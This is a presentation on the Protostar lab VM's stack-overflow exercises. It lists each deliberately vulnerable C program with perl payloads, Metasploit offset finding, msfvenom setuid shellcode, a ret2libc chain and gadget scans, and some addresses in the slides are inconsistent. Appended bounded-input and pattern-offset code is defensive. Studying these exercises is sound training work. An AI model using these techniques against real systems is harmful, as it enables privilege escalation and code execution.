Exploit-Exercises.com Stack Overflows

Presentation based on the Exploit-Exercises.com Protostar virtual machine. Example 6 may not work correctly.

1. Exploit-Exercises.com Stack Overflows
Spenser Reinhardt

2. What Is A Buffer Overflow?
A buffer overflow occurs when a program or process tries to store more data in a buffer (temporary data storage area) than it was intended to hold. Since buffers are created to contain a finite amount of data, the extra information, which has to go somewhere, can overflow into adjacent buffers, corrupting or overwriting the valid data held in them.

3. Tools In Use
Perl: Inline perl expressions, either using $( expression ) or expression | program, depending on the need. Used to quickly
GDB: GNU Debugger, allows debugging of applications and inspecting of live variables, memory, and registers. Crash dumps, known as core files, can also be analyzed in the same manner.
Metasploit Console: In ../msf/tools
    Pattern_Create.rb: Creates a specialized pattern that can be used to identify how many bytes into a buffer important locations are, such as EIP or variables.
    Pattern_Offset.rb: Based on a small subset of bytes returned from overflowed buffers filled with patterns from pattern_create, this locates how far into the buffer the returned bytes are.
    Venom (msfvenom): Creates shellcode, with the ability to change function, and encode shellcode to avoid bad characters and detection.

4. Preparing Protostar
In the virtual console window:
Login
    User: root
    Pass: godmode
Get an IP
    dhclient & ifconfig | grep "inet addr"

5. Preparing Protostar Cont.
Login
    ssh user@[IP]
    Pass: user
Unlimit core dumps
    ulimit -c unlimited
    ulimit -a | grep core
Change to bash shell
    /bin/bash
Change to binary dir
    cd /opt/protostar/bin/

6. Level 0 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        volatile int modified;
        char buffer[64];

        modified = 0;
        gets(buffer);   /* unbounded read: input past 64 bytes reaches modified */

        if(modified != 0) {
            printf("you have changed the modified variable\n");
        } else {
            printf("Try again?\n");
        }
    }

7. Level 0 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP)
    int modified = 0
    char buffer = 64 bytes
    Uninitialized stack space

8. Level 0 (Solution)
    /opt/protostar/bin$ ./stack0
    test
    Try again?
    /opt/protostar/bin$ perl -e 'print "a"x68' | ./stack0
    you have changed the modified variable

9. Level 1 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>
    #include <err.h>

    int main(int argc, char **argv)
    {
        volatile int modified;
        char buffer[64];

        if(argc == 1) {
            errx(1, "please specify an argument\n");
        }

        modified = 0;
        strcpy(buffer, argv[1]);   /* unbounded copy of attacker-controlled argv[1] */

        if(modified == 0x61626364) {
            printf("you have correctly got the variable to the right value\n");
        } else {
            printf("Try again, you got 0x%08x\n", modified);
        }
    }

10. Level 1 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP)
    int modified = 0 (goal: modified == 0x61626364)
    char buffer = 64 bytes
    Uninitialized stack space

11. Level 1 (Solution)
    ./stack1 test
    Try again, you got 0x00000000
    ./stack1 $(perl -e 'print "a"x70')
    Try again, you got 0x61616161
    ./pattern_create.rb 70
    [MSF Pattern]
    ./stack1 [MSF Pattern]
    Try again, you got 0x63413163
    ./pattern_offset.rb 63413163
    = 64 bytes
    ./stack1 $(perl -e 'print "a"x64 . "\x64\x63\x62\x61\n\r"')
    you have correctly got the variable to the right value

12. Level 2 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>
    #include <err.h>

    int main(int argc, char **argv)
    {
        volatile int modified;
        char buffer[64];
        char *variable;

        variable = getenv("GREENIE");

        if(variable == NULL) {
            errx(1, "please set the GREENIE environment variable\n");
        }

        modified = 0;
        strcpy(buffer, variable);   /* unbounded copy of an environment variable */

        if(modified == 0x0d0a0d0a) {
            printf("you have correctly modified the variable\n");
        } else {
            printf("Try again, you got 0x%08x\n", modified);
        }
    }

13. Level 2 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP)
    int modified = 0 (goal: modified == 0x0d0a0d0a)
    char buffer = 64 bytes
    char *variable
    Uninitialized stack space

14. Level 2 (Solution)
    ./stack2
    stack2: please set the GREENIE environment variable
    export GREENIE=$(perl -e 'print "a"x80')
    ./stack2
    Try again, you got 0x61616161
    ./pattern_create.rb 70
    [MSF Pattern]
    export GREENIE=[MSF locator string]
    ./stack2
    Try again, you got 0x63413163
    ./pattern_offset.rb 63413163
    = 64 bytes
    export GREENIE=$(perl -e 'print "a"x64 . "\x0a\x0d\x0a\x0d\n\r"')
    ./stack2
    you have correctly modified the variable

15. Level 3 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    void win()
    {
        printf("code flow successfully changed\n");
    }

    int main(int argc, char **argv)
    {
        volatile int (*fp)();
        char buffer[64];

        fp = 0;
        gets(buffer);   /* unbounded read: input past 64 bytes reaches fp */

        if(fp) {
            printf("calling function pointer, jumping to 0x%08x\n", fp);
            fp();
        }
    }

16. Level 3 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP)
    int fp = 0 (must point to win(); win() = 0x08048424)
    char buffer = 64 bytes
    Uninitialized stack space

17. Level 3 (Solution)
    ./stack3
    Test
    perl -e 'print "a"x80' | ./stack3
    calling function pointer, jumping to 0x61616161
    Segmentation fault
    ./pattern_create.rb 70
    [MSF Pattern]
    ./stack3 - [MSF Pattern]
    calling function pointer, jumping to 0x63413163
    ./pattern_offset.rb 63413163
    = 64 bytes
    objdump -d ./stack3 | grep win
    08048424 <win>:
    perl -e 'print "a"x64 . "\x24\x84\x04\x08\n\r"' | ./stack3
    calling function pointer, jumping to 0x08048424
    code flow successfully changed

18. Level 4 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    void win()
    {
        printf("code flow successfully changed\n");
    }

    int main(int argc, char **argv)
    {
        char buffer[64];

        gets(buffer);   /* unbounded read: input can reach the saved EIP */
    }

19. Level 4 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP)
    EIP must point to win() (win() = 0x080483f4)
    char buffer = 64 bytes
    Uninitialized stack space

20. Level 4 (Solution)
    ./stack4
    Test
    perl -e 'print "a"x80' | ./stack4
    Segmentation fault
    ./pattern_create.rb 70
    [MSF Pattern]
    gdb --quiet ./stack4
    run - [MSF Pattern]
    Program received signal SIGSEGV, Segmentation fault.
    0x63413563 in ?? ()
    ./pattern_offset.rb 63413563
    = 76 bytes
    objdump -d ./stack4 | grep win
    080483f4 <win>:
    perl -e 'print "a"x76 . "\xf4\x83\x04\x08"' | ./stack4
    code flow successfully changed
    Segmentation fault

21. Level 5 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    int main(int argc, char **argv)
    {
        char buffer[64];

        gets(buffer);   /* unbounded read: input can reach the saved EIP */
    }

22. Level 5 (Diagram)
The Stack
    Previous stack frames (contains previous EIP & ESP): overwritten with NOP sled and shellcode
    Current EIP must be overwritten to point to our shellcode (EIP = 0x08048424)
    char buffer = 76 bytes
    Uninitialized stack space

23. Level 5 (Solution 1)
    perl -e 'print "a"x80' | ./stack5
    Segmentation fault
    ./pattern_create.rb 80
    [MSF Pattern]
    gdb --quiet ./stack5
    run
    [MSF Pattern]
    Program received signal SIGSEGV, Segmentation fault.
    0x63413563 in ?? ()
    (gdb) x $esp
    0xbffff7c0
    ./pattern_offset.rb 63413563
    = 76 bytes
    Location of EIP = 0xbffff760 + 76h = 0xbffff7d6

24. Level 5 (Solution 2)
    msfvenom -p linux/x86/exec -f pl -b '\x00\xff' CMD=/bin/bash PrependSetresuid=true
    = ~70 bytes
    perl -e 'print "a"x76 . "\xc0\xf7\xff\xbf" . "\x90"x16 . [SHELLCODE]' | ./stack5
Result: Program exits cleanly without executing a shell.
Reason: /bin/dash has issues with the incoming stdin from the original program. It must check for this issue and close automatically. This is due to the gets() function being used.
More details: StackOverflow.com

25. Level 5 (Solution 3)
    msfvenom -p linux/x86/exec -f pl -b '\xc0\x04\x00\xff' CMD='touch /tmp/touch' PrependSetresuid=true
    perl -e 'print "a"x76 . "\xc0\xf7\xff\xbf" . "\x90"x16 . [SHELLCODE]' | ./stack5
    /opt/protostar/bin$ ls /tmp/
    touch
Local shell code for gets() - http://www.exploit-db.com/exploits/13357/

26. Level 6 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>

    void getpath()
    {
        char buffer[64];
        unsigned int ret;

        printf("input path please: ");
        fflush(stdout);

        gets(buffer);

        /* reject return addresses that point into the stack (0xbf......) */
        ret = __builtin_return_address(0);
        if((ret & 0xbf000000) == 0xbf000000) {
            printf("bzzzt (%p)\n", ret);
            _exit(1);
        }

        printf("got path %s\n", buffer);
    }

    int main(int argc, char **argv)
    {
        getpath();
    }

27. Level 6 (Diagram)
The Stack
    Previous stack frames
    Current EIP
    char buffer = 64 bytes
    Uninitialized stack space

28. Level 6 (Diagram 2)
The Stack
    This address
    Address of SHELLCODE
    Address of SHELLCODE
    Address of FORMATSTRING
    Address of execl()
    Address of printf() (previously EIP)
    char buffer = 64 bytes
    Uninitialized stack space

29. Level 6 (Solution 1)
    ./pattern_create.rb 100
    [MSF Pattern]
    gdb --quiet ./stack6
    run
    input path please: [MSF Pattern]
    got path [MSF Pattern]
    Program received signal SIGSEGV, Segmentation fault.
    0x37634136 in ?? ()
    ./pattern_offset.rb 0x37634136
    80
    msfvenom -p linux/x86/exec -f pl -b '\xc0\x04\x00\xff' CMD='touch /tmp/touch' PrependSetresuid=true
    [SHELLCODE] ~ 80 bytes
    perl -e 'print "a"x80 . "\xf0\xf7\xff\xbf" . [SHELLCODE]' | ./stack6
    input path please: bzzzt (0xbffff7f0)

30. Level 6 (Solution 2)
    gdb --quiet ./stack6
    (gdb) break main
    Breakpoint 1 at 0x8048500: file stack6/stack6.c, line 27.
    (gdb) run
    Starting program: /opt/protostar/bin/stack6
    Breakpoint 1, main (argc=1, argv=0xbffff864)
    (gdb) print printf
    $1 = {} 0xb7eddf90
    (gdb) print execl
    $2 = {} 0xb7f2e460
    export FORMATSTRING='%3$n'
    export SHELLCODE=/location/to/shellcodefile
    ~/getenvaddr FORMATSTRING ./stack6
    FORMATSTRING will be at 0xbffff9a7
    ~/getenvaddr SHELLCODE ./stack6
    SHELLCODE will be at 0xbffff9b6

31. Level 6 (Solution 3)
(Using altered stack6 binary)
    ~/stackx
    input path please: a
    0xbffff75c
    got path a
    gdb --quiet ~/stackx
    (gdb) break getpath
    Breakpoint 1 at 0x804848a
    (gdb) run
    Starting program: /home/user/stackx
    Breakpoint 1, 0x0804848a in getpath ()
    (gdb) x/4000s $esp
    0xbffff966: "/home/user/stackx"
    0xbfffffea: "/home/user/stackx"

32. Level 6 (Solution 4)
    /home/user/stackx          = 17 bytes
    /opt/protostar/bin/stack6  = 25 bytes
    Difference of              = 8 bytes
    Shows twice in mem         = 16 bytes total
    80 x a                     = 80 bytes
    20 for other addresses     = 20 bytes
    Starting point of          = 0xbffff75c
    perl -e 'printf("0x%08x\n", 0xbffff75c + 20 + 80 + 16)'
    0xbffff7d0

33. Level 6 (Solution 5)
    printf               = 0xB7EDDF90
    execl                = 0xB7F2E460
    $FORMATSTRING        = 0xBFFFF9A8
    $SHELLCODE           = 0xBFFFF9B6
    End of buffer (here) = 0xBFFFF7D0
    BUFFER (80) | printf | execl | FORMATSTRING | SHELLCODE | SHELLCODE | here
    perl -e 'print "a"x80 . "\x90\xdf\xed\xb7" . "\x60\xe4\xf2\xb7" . "\xa8\xf9\xff\xbf" . "\xb6\xf9\xff\xbf"x2 . "\xd0\xf7\xff\xbf"' | ./stack6
    Seg fault

34. Level 7 (Source)
    #include <stdlib.h>
    #include <unistd.h>
    #include <stdio.h>
    #include <string.h>

    char *getpath()
    {
        char buffer[64];
        unsigned int ret;

        printf("input path please: ");
        fflush(stdout);

        gets(buffer);

        /* reject return addresses in the 0xb....... range */
        ret = __builtin_return_address(0);
        if((ret & 0xb0000000) == 0xb0000000) {
            printf("bzzzt (%p)\n", ret);
            _exit(1);
        }

        printf("got path %s\n", buffer);
        return strdup(buffer);
    }

    int main(int argc, char **argv)
    {
        getpath();
    }

35. Level 7 (Diagram)
The Stack
    Previous stack frames (contains EIP & ESP)
    Address of SHELLCODE
    Filler buffer = 8 bytes
    Address of jmp, jmp, ret
    char buffer = 80 bytes
    Uninitialized stack space

36. Level 7 (Solution 1)
    ./pattern_create.rb 100
    [MSF Pattern]
    gdb --quiet ./stack7
    input path please: [MSF Pattern]
    Program received signal SIGSEGV, Segmentation fault.
    0x37634136 in ?? ()
    ./pattern_offset.rb 0x37634136
    80

37. Level 7 (Solution 2)
    scp user@[IP]:/opt/protostar/bin/stack7 ~/stack7
    msfelfscan -j edx ~/stack7
    [~/stack7]
    msfelfscan -p ~/stack7
    [~/stack7]
    0x08048492 pop ebx; pop ebp; ret
    0x080485c7 pop edi; pop ebp; ret
    0x080485f7 pop ebx; pop ebp; ret

38. Level 7 (Solution 3)
    perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "c"x100' > /tmp/7-test
    gdb --quiet ./stack7
    (gdb) run < /tmp/7-test
    Program received signal SIGSEGV, Segmentation fault.
    0x63636363 in ?? ()
    ./pattern_create.rb 50
    [MSF Pattern]
    perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "[MSF Pattern]"' > /tmp/7-test
    gdb --quiet ./stack7
    (gdb) run < /tmp/7-test
    Program received signal SIGSEGV, Segmentation fault.
    0x33614132 in ?? ()

39. Level 7 (Solution 4)
    ./pattern_offset.rb 0x33614132
    8
    perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "C"x8 . "D"x4' > /tmp/7-test
    gdb --quiet ./stack7
    (gdb) run < /tmp/7-test
    Starting program: /opt/protostar/bin/stack7 < /tmp/7-test
    Program received signal SIGSEGV, Segmentation fault.
    0x44444444 in ?? ()
    msfvenom -p linux/x86/exec -f pl -b '\xc0\x04\x00\xff' CMD='touch /tmp/touch' PrependSetresuid=true
    [MSF Shellcode]
    export SHELLCODE=`perl -e 'print "[MSF Shellcode]"'`
    ~/getenvaddr SHELLCODE ./stack7
    SHELLCODE will be at 0xbffff960

40. Level 7 (Solution 4)
    perl -e 'print "a"x80 . "\x92\x84\x04\x08" . "C"x8 . "\x60\xf9\xff\xbf"' | ./stack7
    input path please: got path aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaCCCCCCCC`
    ls /tmp/
    touch

41. Questions?
Thanks!
    Exploit-exercises.com - Virtual machine creators
    Mattandreko.com - Tutorials
    Hacking: The Art of Exploitation - Jon Erickson
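
Levels 0 through 2 all fail for the same reason: gets() and strcpy() write without knowing the size of the 64-byte buffer. The following is an added example, not code from the presentation or from Protostar, showing bounded replacements for both calls and what happens when the 68-byte input from the Level 0 solution is fed to them. The names read_line, copy_arg, run_level0 and struct frame are assumptions made for this illustration.

```c
#include <stdio.h>
#include <string.h>

/* Same shape as the Level 0 frame: a 64-byte buffer beside the flag. */
struct frame { char buffer[64]; volatile int modified; };

/* Bounded gets() replacement: 0 = whole line fit, 1 = line too long
 * (truncated, remainder discarded), -1 = EOF or error before any data. */
int read_line(FILE *in, char *dst, size_t cap)
{
    if (cap == 0 || fgets(dst, (int)cap, in) == NULL) return -1;
    size_t n = strlen(dst);
    if (n > 0 && dst[n - 1] == '\n') {
        dst[n - 1] = '\0';
        return 0;
    }
    int c, too_long = 0;            /* no newline seen: drain the line */
    while ((c = fgetc(in)) != EOF && c != '\n')
        too_long = 1;
    return too_long;
}

/* Bounded strcpy() replacement: refuses input that does not fit. */
int copy_arg(char *dst, size_t cap, const char *src)
{
    size_t n = strlen(src);
    if (n >= cap) return -1;
    memcpy(dst, src, n + 1);        /* n + 1 copies the terminator too */
    return 0;
}

/* Constructed input: len bytes of 'a' with no newline, as the slides'
 * perl one-liners produce. Returns read_line()'s status. */
int run_level0(size_t len, int *modified_out)
{
    struct frame f = { .modified = 0 };
    FILE *in = tmpfile();
    if (in == NULL) return -2;
    for (size_t i = 0; i < len; i++) fputc('a', in);
    rewind(in);
    int rc = read_line(in, f.buffer, sizeof f.buffer);
    fclose(in);
    *modified_out = f.modified;
    return rc;
}
int main(void)
{
    int m = 0, rc = run_level0(68, &m);
    printf("68 bytes in: rc=%d modified=%d\n", rc, m);
    return 0;
}
```

A return value of 1 is the signal to reject or log the input rather than continue with the truncated data.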
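
The pattern_create / pattern_offset step used at every level works because the Aa0Aa1Aa2... pattern lets a 4-byte value seen in a register or variable after a crash be mapped back to the input offset that supplied it. The following is an added example, not Metasploit's code and not from the presentation, that reimplements that lookup for crash triage and reproduces the offsets shown on the slides. The function names are assumptions, and the value is assumed to come from a little-endian 32-bit target such as the Protostar VM.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* Byte i of the cyclic pattern Aa0Aa1...Aa9Ab0...: each 3-byte group is
 * upper, lower, digit; the sequence repeats after 26*26*10 groups. */
char pattern_byte(size_t i)
{
    size_t group = i / 3;
    switch (i % 3) {
    case 0:  return (char)('A' + (group / 260) % 26);
    case 1:  return (char)('a' + (group / 10) % 26);
    default: return (char)('0' + group % 10);
    }
}

/* Write len pattern bytes plus a terminator into dst (len + 1 bytes). */
void pattern_create(char *dst, size_t len)
{
    for (size_t i = 0; i < len; i++)
        dst[i] = pattern_byte(i);
    dst[len] = '\0';
}

/* Offset at which the 32-bit value v, as read from a little-endian
 * register or variable, starts inside a len-byte pattern; -1 if absent. */
long pattern_offset(uint32_t v, size_t len)
{
    for (size_t off = 0; off + 4 <= len; off++) {
        uint32_t window = 0;
        for (int k = 3; k >= 0; k--)   /* lowest address = lowest byte */
            window = (window << 8) | (unsigned char)pattern_byte(off + k);
        if (window == v)
            return (long)off;
    }
    return -1;
}

int main(void)
{
    char pat[21];
    pattern_create(pat, 20);
    printf("%s\n", pat);
    printf("0x63413163 -> %ld\n", pattern_offset(0x63413163u, 70));
    printf("0x37634136 -> %ld\n", pattern_offset(0x37634136u, 100));
    return 0;
}
```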